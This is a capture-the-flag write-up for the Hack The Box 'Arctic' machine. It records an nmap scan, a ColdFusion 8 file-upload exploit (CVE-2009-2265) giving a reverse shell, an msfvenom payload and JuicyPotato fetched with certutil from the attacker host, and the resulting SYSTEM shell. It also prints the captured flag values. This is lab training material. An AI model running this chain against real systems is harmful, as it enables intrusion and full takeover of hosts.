Skip to content

HTB Arctic done

Arctic

OS:

Windows

Technology:

Adobe Coldfusion 8

IP Address:

10.129.129.212

Open ports:

135/tcp   open  msrpc   Microsoft Windows RPC
8500/tcp  open  http    JRun Web Server
49154/tcp open  msrpc   Microsoft Windows RPC

Users and pass:

Nmap

┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Arctic]
└─$ sudo nmap -A -sV --script=default -p- -oA 10.129.209.235_nmap 10.129.209.235 ; cat 10.129.209.235_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-18 13:52 UTC
Nmap scan report for 10.129.209.235
Host is up (0.043s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT      STATE SERVICE VERSION
135/tcp   open  msrpc   Microsoft Windows RPC
8500/tcp  open  http    JRun Web Server
49154/tcp open  msrpc   Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|7|2008|8.1|Vista (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows Embedded Standard 7 (91%), Microsoft Windows 7 or Windows Server 2008 R2 (89%), Microsoft Windows Server 2008 R2 (89%), Microsoft Windows Server 2008 R2 or Windows 8.1 (89%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (89%), Microsoft Windows 7 (89%), Microsoft Windows 7 Professional or Windows 8 (89%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Open website: http://10.129.128.247:8500/

http://10.129.128.247:8500/

Find software: Adobe Coldfusion 8

http://10.129.128.247:8500/cfdocs/dochome.htm

Exploit: ExploitDev Journey #1 | CVE-2009-2265 | ColdFusion 8.0.1 - Arbitrary File Upload / RCE

[ExploitDev Journey #1 | CVE-2009-2265 | ColdFusion 8.0.1 - Arbitrary File Upload / RCE](https://github.com/0xConstant/CVE-2009-2265)

Download exploit

┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Arctic]
└─$ git clone https://github.com/0xConstant/CVE-2009-2265.git
Cloning into 'CVE-2009-2265'...
remote: Enumerating objects: 36, done.
remote: Counting objects: 100% (36/36), done.
remote: Compressing objects: 100% (29/29), done.
remote: Total 36 (delta 9), reused 0 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (36/36), 13.31 KiB | 801.00 KiB/s, done.
Resolving deltas: 100% (9/9), done.

Run exploit - revshell

┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Arctic/CVE-2009-2265]
└─$ python3 exploit.py http://10.129.110.154:8500 10.10.14.127 80 
[ + ] Upload successful, uploaded to:
[>>>] http://10.129.110.154:8500/userfiles/file/loKWjsFqLY.jsp
[...] Opening the shell, hold your beer...
[***] Check your listener!
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Arctic/CVE-2009-2265]
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Arctic/CVE-2009-2265]
└─$ python3 exploit.py http://10.129.110.154:8500 10.10.14.127 80 
[ + ] Upload successful, uploaded to:
[>>>] http://10.129.110.154:8500/userfiles/file/loKWjsFqLY.jsp
[...] Opening the shell, hold your beer...
[***] Check your listener!
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Arctic/CVE-2009-2265]
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Arctic]
└─$ netcat -lvnp 80
listening on [any] 80 ...
connect to [10.10.14.127] from (UNKNOWN) [10.129.110.154] 49183
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\ColdFusion8\runtime\bin>whoami /all
whoami /all

USER INFORMATION

User Name    SID                                          
============ =============================================
arctic\tolis S-1-5-21-2913191377-1678605233-910955532-1000

Read flag: user.txt

C:\ColdFusion8\runtime\bin>cd C:\Users
cd C:\Users

C:\Users>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 5C03-76A8

 Directory of C:\Users

22/03/2017  09:00 ��    <DIR>          .
22/03/2017  09:00 ��    <DIR>          ..
22/03/2017  08:10 ��    <DIR>          Administrator
14/07/2009  06:57 ��    <DIR>          Public
22/03/2017  09:00 ��    <DIR>          tolis
               0 File(s)              0 bytes
               5 Dir(s)   1.433.792.512 bytes free

C:\Users>cd tolis\Desktop
cd tolis\Desktop

C:\Users\tolis\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 5C03-76A8

 Directory of C:\Users\tolis\Desktop

22/03/2017  09:00 ��    <DIR>          .
22/03/2017  09:00 ��    <DIR>          ..
20/11/2024  12:27 ��                34 user.txt
               1 File(s)             34 bytes
               2 Dir(s)   1.404.567.552 bytes free

C:\Users\tolis\Desktop>whoami /all
whoami /all

USER INFORMATION
----------------

User Name    SID                                          
============ =============================================
arctic\tolis S-1-5-21-2913191377-1678605233-910955532-1000


GROUP INFORMATION
-----------------

Group Name                           Type             SID          Attributes                                        
==================================== ================ ============ ==================================================
Everyone                             Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                        Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                 Well-known group S-1-5-6      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                        Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users     Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization       Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
LOCAL                                Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication     Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label            S-1-16-12288 Mandatory group, Enabled by default, Enabled group


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

C:\Users\tolis\Desktop>ipconfig 
ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . : .htb
   IPv4 Address. . . . . . . . . . . : 10.129.110.154
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : 10.129.0.1

Tunnel adapter isatap..htb:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : .htb

Tunnel adapter Local Area Connection* 9:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 

C:\Users\tolis\Desktop>type user.txt
type user.txt
741a46e19960edefeb1d58eca0717ccd

C:\Users\tolis\Desktop>

Privilege Escalation

Prepare revshell

┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Arctic]
└─$ msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.127 lport=135 -f exe -o rev.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: rev.exe

Download JuicePotato.exe and rev.exe

C:\Users\tolis\Desktop>certutil.exe -urlcache -split -f "http://10.10.14.127/JuicyPotato.exe" JuicyPotato.exe
certutil.exe -urlcache -split -f "http://10.10.14.127/JuicyPotato.exe" JuicyPotato.exe
****  Online  ****
  000000  ...
  054e00
CertUtil: -URLCache command completed successfully.

C:\Users\tolis\Desktop>certutil.exe -urlcache -split -f "http://10.10.14.127/rev.exe" rev.exe
certutil.exe -urlcache -split -f "http://10.10.14.127/rev.exe" rev.exe
****  Online  ****
  000000  ...
  01204a
CertUtil: -URLCache command completed successfully.
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Arctic]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.103.111 - - [18/Nov/2024 20:40:03] "GET /JuicyPotato.exe HTTP/1.1" 200 -
10.129.103.111 - - [18/Nov/2024 20:40:03] "GET /JuicyPotato.exe HTTP/1.1" 200 -
10.129.103.111 - - [18/Nov/2024 20:40:25] "GET /rev.exe HTTP/1.1" 200 -
10.129.103.111 - - [18/Nov/2024 20:40:27] "GET /rev.exe HTTP/1.1" 200 -

Start JuicyPotato

C:\Users\tolis\Desktop>JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -t * -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D} -a "/c C:\Users\tolis\Desktop\rev.exe"
JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -t * -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D} -a "/c C:\Users\tolis\Desktop\rev.exe"
Testing {9B1F122C-2982-4e91-AA8B-E071D54F2A4D} 1337
....
[+] authresult 0
{9B1F122C-2982-4e91-AA8B-E071D54F2A4D};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

C:\Users\tolis\Desktop>
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Arctic]
└─$ netcat -lvnp 135
listening on [any] 135 ...
connect to [10.10.14.127] from (UNKNOWN) [10.129.103.111] 49392
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

Read flag: root.txt

C:\Windows\system32>cd C:\Users\Administrator\Desktop
cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 5C03-76A8

 Directory of C:\Users\Administrator\Desktop

22/03/2017  09:02 ��    <DIR>          .
22/03/2017  09:02 ��    <DIR>          ..
20/11/2024  05:52 ��                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   1.431.629.824 bytes free

C:\Users\Administrator\Desktop>whoami
whoami
nt authority\system

C:\Users\Administrator\Desktop>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . : .htb
   IPv4 Address. . . . . . . . . . . : 10.129.103.111
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : 10.129.0.1

Tunnel adapter isatap..htb:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : .htb

Tunnel adapter Local Area Connection* 9:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 

C:\Users\Administrator\Desktop>type root.txt
type root.txt
43a09734ba74ee1798fc33ec3083ebca

C:\Users\Administrator\Desktop>

References

[ExploitDev Journey #1 | CVE-2009-2265 | ColdFusion 8.0.1 - Arbitrary File Upload / RCE](https://github.com/0xConstant/CVE-2009-2265)

[RoguePotato, PrintSpoofer, SharpEfsPotato, GodPotato]( https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer)

Lessons Learned

Tags